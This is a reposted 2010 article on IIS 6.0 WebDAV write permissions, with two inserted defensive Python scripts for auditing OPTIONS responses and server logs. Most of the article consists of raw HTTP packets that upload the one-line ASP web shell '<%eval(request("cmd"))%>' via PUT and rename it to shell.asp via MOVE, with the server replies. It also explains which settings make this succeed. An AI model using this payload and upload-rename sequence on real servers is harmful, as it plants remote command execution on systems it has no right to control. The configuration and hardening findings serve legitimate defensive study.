Why IIS allows PUT but not MOVE - vulnerability warning - the black bar safety net

2010-04-24T00:00:00
ID MYHACK58:62201026791
Type myhack58
Reporter Anonymous
Modified 2010-04-24T00:00:00

Description

Today, while testing the IIS PUT vulnerability, I found that I could PUT any file that IIS does not parse, and MOVE also worked normally, but I could not MOVE a file to asp, asa or any other type that IIS parses. I searched the Internet for some articles and found that this is because "script resource access" was not selected in the IIS configuration. In the general case an IIS configuration would have this selected, but I happened to run into this problem. The article below describes the issue in detail, so I am reposting it here as a record.

Original address: A Brief Discussion of IIS Special Permissions

After writing the article "A Brief Discussion of IIS Special Permissions", I demonstrated the use of IIS write permission in an internal laboratory report, but without success, and I was puzzled. I had clearly tested it before, so how could it fail? It had to be an IIS configuration problem. For that demo I used a freshly installed Win2003 virtual machine with IIS on its default settings, and ticked the "write" check box on the Home Directory tab. It failed in two places:

(1) The OPTIONS command cannot show the set of methods IIS supports.

Submit the following packet:

OPTIONS / HTTP/1.1
Host: www.redicecn.cn

Returns the following message:

HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD
Content-Length: 0
Server: Microsoft-IIS/6.0
Public: OPTIONS, TRACE, GET, HEAD, POST
X-Powered-By: ASP.NET
Date: Mon, 01 Jan 2010 07:39:56 GMT

Note: the set of methods IIS supports is not returned.

(2) PUT of both the asp file and the txt file failed.

Submit the following packet:

PUT /test.txt HTTP/1.1
Host: www.redicecn.cn
Content-Length: 26

<%eval(request("cmd"))%>

Returns the following message:

HTTP/1.1 501 Not Implemented
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 01 Jan 2010 07:50:53 GMT

Note: the write did not succeed.

Submit the following packet:

PUT /test.asp HTTP/1.1
Host: www.redicecn.cn
Content-Length: 26

<%eval(request("cmd"))%>

Returns the following message:

HTTP/1.1 404 Not Found
Content-Length: 83
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 01 Jan 2010 07:43:07 GMT

<html><head><title>Error</title></head><body>the system cannot find the file specified. </body></html>

Note: the write did not succeed.

Solving the problem:

Today I suddenly saw that "WebDAV" is disabled in the IIS "Web Service Extensions" list. Could the cause be that "WebDAV" is disabled? I enabled "WebDAV" and, ha ha, it turned out to succeed. The cause really was that "WebDAV" was disabled.

Submit the following packet again (OPTIONS command):

OPTIONS / HTTP/1.1
Host: www.redicecn.cn

Returns the following message:

HTTP/1.1 200 OK
Date: Mon, 01 Jan 2010 07:54:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL: <DAV:sql>
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
Cache-Control: private

Note: IIS successfully returns the set of methods it supports.
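When auditing your own servers, the difference between the two OPTIONS responses above can be checked mechanically. The following is an added example, not part of the original article: it parses a raw response, reports whether the WebDAV headers are present, and separates the server-wide Public list from the per-resource Allow list. The function names are hypothetical and the two inputs are the page's own responses, trimmed to the relevant headers.

```python
# Added example: classify an OPTIONS response the way the page reads it by eye.
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}

def parse_headers(raw):
    """Return (status_code, {lower-case header name: value}) from a raw response."""
    lines = [l.strip() for l in raw.strip().splitlines() if l.strip()]
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers

def method_set(value):
    """Split a comma-separated method list into an upper-case set."""
    return {m.strip().upper() for m in value.split(",") if m.strip()}

def audit_options(raw):
    """Summarise which write-capable methods the server and the resource advertise."""
    status, h = parse_headers(raw)
    public = method_set(h.get("public", ""))   # methods the server supports at all
    allow = method_set(h.get("allow", ""))     # methods allowed on the requested URL
    return {
        "status": status,
        "webdav_enabled": "dav" in h or h.get("ms-author-via", "").upper() == "DAV",
        "server_write_methods": sorted(public & WRITE_METHODS),
        "resource_write_methods": sorted(allow & WRITE_METHODS),
        "public_only": sorted(public - allow),
    }

# The two OPTIONS responses shown on this page, trimmed to the relevant headers.
BEFORE = """HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD
Server: Microsoft-IIS/6.0
Public: OPTIONS, TRACE, GET, HEAD, POST
"""
AFTER = """HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
MS-Author-Via: DAV
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
"""

if __name__ == "__main__":
    for name, raw in (("WebDAV disabled", BEFORE), ("WebDAV enabled", AFTER)):
        print(name, audit_options(raw))
```

In the second response PUT appears in Public but not in Allow for "/", so an audit should read both headers: the later PUT to /test.txt on this page still returns 201.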

Again submit the following packet:

PUT /test.txt HTTP/1.1
Host: www.redicecn.cn
Content-Length: 26

<%eval(request("cmd"))%>

Returns the following message:

HTTP/1.1 201 Created
Date: Mon, 01 Jan 2010 07:57:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.redicecn.cn/test.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

The test.txt file was successfully written to the IIS root directory. But a direct PUT of the asp file still returns the same error message. The method script kiddies commonly use is to PUT a txt Trojan and then use the MOVE method to rename the txt Trojan to an asp Trojan.

Try to submit the following packet:

MOVE /test.txt HTTP/1.1
Host: www.redicecn.cn
Destination: http://www.redicecn.cn/shell.asp

Returns the following message:

HTTP/1.1 207 Multi-Status
Date: Mon, 01 Jan 2010 08:02:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.redicecn.cn/shell.asp
Content-Type: text/xml
Transfer-Encoding: chunked

b8
<?xml version="1.0"?><a:multistatus xmlns:a="DAV:"><a:response><a:href>http://www.redicecn.cn/shell.asp</a:href><a:status>HTTP/1.1 403 Forbidden</a:status></a:response></a:multistatus>
0

Note: it failed, which is depressing. It seems IIS has some permission in the way. An impasse....

In 2010, in the morning, I leafed through the book Hacker Penetration Notes, which knowledge-based Rogue gave to me. It is a book by his friend Ice the origin, who sent him two copies. In the section on in-depth analysis of IIS write permissions, I found that the author came across the same problem as I did. The solution he gives is to tick the "script resource access" check box. Test it out:

Submit the following packet:

MOVE /test.txt HTTP/1.1
Host: www.redicecn.cn
Destination: http://www.redicecn.cn/shell.asp

Returns the following message:

HTTP/1.1 201 Created
Date: Mon, 01 Jan 2010 08:09:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.redicecn.cn/shell.asp
Content-Type: text/xml
Content-Length: 0

Success. I also tested that, with the "script resource access" check box not ticked, MOVE can still rename the file to a non-script file name, for example gif or txt. But a direct PUT of the asp file still returns the same error message. This problem seems really hard to solve, so I am putting it aside for the time being.
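A defender can look for the same PUT-then-MOVE sequence in the server's own logs. The following is an added example, not part of the original article: it parses IIS W3C extended log text and reports an upload that the same client later renames. The function names are hypothetical, the log lines are constructed, and the sketch assumes W3C logging without the Destination header, so the first later request for a script file is used as the clue to the new name.

```python
# Added example: flag the PUT-then-MOVE sequence in IIS W3C extended logs.
SCRIPT_EXT = (".asp", ".asa")          # script types named on this page

def parse_w3c(text):
    """Yield one dict per request, using the log's own #Fields: directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def find_put_then_move(text):
    """Return findings for uploads that are later renamed by the same client."""
    uploaded = {}                      # (client ip, uri) -> time of successful PUT
    moved = {}                         # client ip -> uri it renamed
    findings = []
    for r in parse_w3c(text):
        ip, uri = r["c-ip"], r["cs-uri-stem"].lower()
        method, status = r["cs-method"].upper(), r["sc-status"]
        if method == "PUT" and status in ("200", "201", "204"):
            uploaded[(ip, uri)] = r["time"]
        elif method == "MOVE" and (ip, uri) in uploaded:
            # 201 = renamed; 207 wraps a per-resource status (403 on this page)
            outcome = "renamed" if status in ("201", "204") else "attempt"
            findings.append((outcome, ip, uri, r["time"]))
            if outcome == "renamed":
                moved[ip] = uri
        elif ip in moved and uri.endswith(SCRIPT_EXT) and status == "200":
            # Destination is not in the log, so the first script hit is the clue
            findings.append(("script-hit", ip, uri, r["time"]))
            del moved[ip]
    return findings

# Constructed sample log (documentation IP addresses, not real traffic).
SAMPLE = """#Software: Microsoft Internet Information Services 6.0
#Fields: date time cs-method cs-uri-stem c-ip sc-status
2010-01-01 07:57:44 PUT /test.txt 192.0.2.10 201
2010-01-01 08:02:07 MOVE /test.txt 192.0.2.10 207
2010-01-01 08:09:18 MOVE /test.txt 192.0.2.10 201
2010-01-01 08:10:02 GET /shell.asp 192.0.2.10 200
2010-01-01 08:11:00 GET /default.asp 198.51.100.7 200
"""

if __name__ == "__main__":
    for finding in find_put_then_move(SAMPLE):
        print(*finding)
```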

Finally, I also wanted to test whether NTFS permission settings affect IIS write permission:

Test one: on the site root directory, the IIS anonymous account is allowed "Read & Execute, List Folder Contents, Read", and nothing else is ticked. In testing, PUT can successfully write the file.

Test two: on the site root directory, the IIS anonymous account is allowed "Read & Execute, List Folder Contents, Read", and deny is ticked for "write". In testing, the PUT fails to write the file. The returned packet is as follows:

HTTP/1.1 401 Unauthorized
Content-Length: 75
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 01 Jan 2010 08:33:09 GMT

<html><head><title>Error</title></head><body>error: access is denied.</body></html>

Note: the write operation is rejected.

Now to summarize:

(1) If the "WebDAV" extension is not enabled, the OPTIONS command cannot show the set of methods IIS supports. Even if "write" is ticked, a txt file still cannot be written, and an asp file of course cannot either.

(2) With the "WebDAV" extension enabled and "write" ticked, the txt file can be written. To use the MOVE command to rename the file to a script file suffix, "script resource access" must also be ticked.

(3) Only setting the NTFS permission that denies "write" to the IIS anonymous account rejects the write.

Note: this deny-write permission is very easy to overlook. If it is not set, files can still be written successfully. It is not just about IIS write permission: I have tested with a script Trojan, and if write is not denied, the script Trojan can create and modify files. For Win2003 security settings policies, you can refer to my other article on Windows Server security settings.

Security tip: do not enable the "WebDAV" extension!